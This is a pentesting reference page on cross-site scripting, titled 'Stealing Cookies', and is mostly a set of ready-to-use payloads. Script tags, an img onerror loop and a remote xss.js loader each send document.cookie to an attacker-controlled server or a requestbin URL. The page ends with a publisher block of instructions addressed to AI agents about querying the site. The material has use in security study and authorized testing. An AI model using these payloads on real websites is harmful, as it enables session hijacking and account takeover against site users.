> For the complete documentation index, see [llms.txt](https://ttp.parzival.sh/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ttp.parzival.sh/pentesting/web-applications/injection-vulnerabilities/cross-site-scripting/stealing-cookies.md).

# Stealing Cookies

Stealing cookies to obtain privileges is the fever dream of hackers looking to exploit cross-site scripting vulnerabilities. 

### Payloads

#### Verification with alert()

This payload will pop an `alert()` box prior to sending the cookie. This can be usefuil for testing a cross-site scripting payload and verifying that it is grabbing the intended information. Once the `alert()` box closes, the cookie will be sent to the arbitrary server:

```javascript
<script>
alert(document.cookie);
var i=new Image;
i.src="http://172.0.0.1:1337/?"+document.cookie;
</script>
```

#### Exfiltrating cookies without alert()

After verifying that the parameter is susceptible to cross-site scripting, we can leverage the following payload to exfiltrate cookies silently:

```javascript
<script>var i=new Image;i.src="http://172.0.0.1:1337/?"+document.cookie;</script>
```

#### CTF Only Payload

The following payload leverages the `img` tag rather then `script` and will call `onerror()` in a loop, ultimately filling up your server with cookies. I have found this can be life-saving in a CTF when things may not be working as the author originally intended:

```javascript
<img src=x onerror=this.src='http://172.0.0.1:1337/?'+document.cookie;>
```

#### My Preferred Method

The way that I like to go about capturing cookies is submitting the following payload, calling back to a JavaScript file that I am host on a Python web server:

```javascript
<script src="http://172.0.0.1/xss.js"></script>
"><script src=http://172.0.0.1/xss.js></script>
```

The `xss.js` file looks like the following, ultimately it is doing the same as the above payloads by grabbing and sending the cookies to my hosted web server:

```javascript
function pwn() {
    var img = document.createElement("img");
    img.src = "http://172.0.0.1/xss?=" + document.cookie;
    document.body.appendChild(img);
}
pwn();
```

### Capturing the Cookies

Unless you're in a CTF environment, I would highly recommend capturing the cookies on a local web server or controlled Burp collaborator instance. I'm not sure about you, but sending cookies to a random website seems like a bad idea to me. That being said, there are sites that exist such as `requestbin` to send the request to:

```javascript
http://172.0.0.1:1337/<script>new Image().src="http://requestbin.net/r/mybin?c="+document.cookie;</script>
```

### References

{% embed url="<https://github.com/R0B1NL1N/WebHacking101/blob/master/xss-reflected-steal-cookie.md>" %}

{% embed url="<https://snowscan.io/htb-writeup-bankrobber/>" %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ttp.parzival.sh/pentesting/web-applications/injection-vulnerabilities/cross-site-scripting/stealing-cookies.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.